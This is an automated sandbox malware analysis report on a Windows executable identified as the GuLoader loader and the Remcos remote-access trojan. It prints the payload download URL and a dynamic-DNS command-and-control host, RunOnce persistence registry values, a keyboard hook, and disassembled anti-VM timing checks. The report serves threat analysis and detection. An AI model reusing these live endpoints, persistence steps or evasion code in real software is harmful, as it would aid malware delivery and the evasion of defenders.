Loading ...

Play interactive tourEdit tour

Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Sample Name:pRcHGlVekw.exe
Analysis ID:458794
MD5:d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1:355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256:2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • pRcHGlVekw.exe (PID: 3164 cmdline: 'C:\Users\user\Desktop\pRcHGlVekw.exe' MD5: D2CB32F7C7F384B4BAA8DD13D6B5BBAB)
    • pRcHGlVekw.exe (PID: 1724 cmdline: 'C:\Users\user\Desktop\pRcHGlVekw.exe' MD5: D2CB32F7C7F384B4BAA8DD13D6B5BBAB)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exeReversingLabs: Detection: 17%
      Multi AV Scanner detection for submitted fileShow sources
      Source: pRcHGlVekw.exeReversingLabs: Detection: 17%
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: pRcHGlVekw.exeJoe Sandbox ML: detected
      Source: pRcHGlVekw.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: wealthyrem.ddns.net
      Source: global trafficTCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200
      Source: Joe Sandbox ViewIP Address: 194.5.97.128 194.5.97.128
      Source: Joe Sandbox ViewIP Address: 101.99.94.119 101.99.94.119
      Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
      Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
      Source: global trafficHTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: global trafficHTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: unknownDNS traffic detected: queries for: wealthyrem.ddns.net
      Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmpString found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
      Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmpString found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Installs a global keyboard hookShow sources
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe

      E-Banking Fraud:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218929D NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218435F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021859E6 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02185A22 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218486E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021846AC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02184CFA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218914B NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02181766 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02183DA0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218561A
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218226F
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02180E63
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02189695
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021806BF
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218435F
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02188817
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02183A2B
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02182021
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02188053
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02180248
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218486E
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218086F
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02185E60
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02182A67
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02185E67
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02187C9A
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021896A8
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021846AC
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021886D9
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02180CDF
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02182EC2
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02184CFA
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021810F0
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02180CE4
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02183B1F
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02184111
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02181113
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02181136
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02183123
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02182B4B
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02183944
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02182F76
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02185D6E
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02188960
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02185564
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02181766
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02181BBB
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02183DA0
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021879D6
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021807F2
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02180DF4
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021803F6
      Source: pRcHGlVekw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: pRcHGlVekw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UNDERDEVELOPED.exe.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: UNDERDEVELOPED.exe.16.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
      Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe
      Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe
      Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
      Source: pRcHGlVekw.exeBinary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
      Source: pRcHGlVekw.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@175/3
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMPJump to behavior
      Source: pRcHGlVekw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: pRcHGlVekw.exeReversingLabs: Detection: 17%
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile read: C:\Users\user\Desktop\pRcHGlVekw.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_00407108 push ebp; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218A033 push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218A037 push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218A02B push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218A02F push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_0218A027 push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 16_2_0056A037 push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 16_2_0056A033 push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 16_2_0056A027 push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 16_2_0056A02F push ds; retf
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 16_2_0056A02B push ds; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.08042704515
      Source: initial sampleStatic PE information: section name: .text entropy: 7.08042704515
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exeJump to dropped file

      Boot Survival:

      barindex
      Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbsJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbsJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPANJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPANJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPANJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPANJump to behavior
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL")
      Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeRDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02187EB3 rdtsc
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeWindow / User API: foregroundWindowGot 547
      Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624Thread sleep count: 276 > 30
      Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624Thread sleep time: -138000s >= -30000s
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeLast function: Thread delayed
      Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell")
      Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN
      Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeSystem information queried: ModuleInformation

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeThread information set: HideFromDebugger
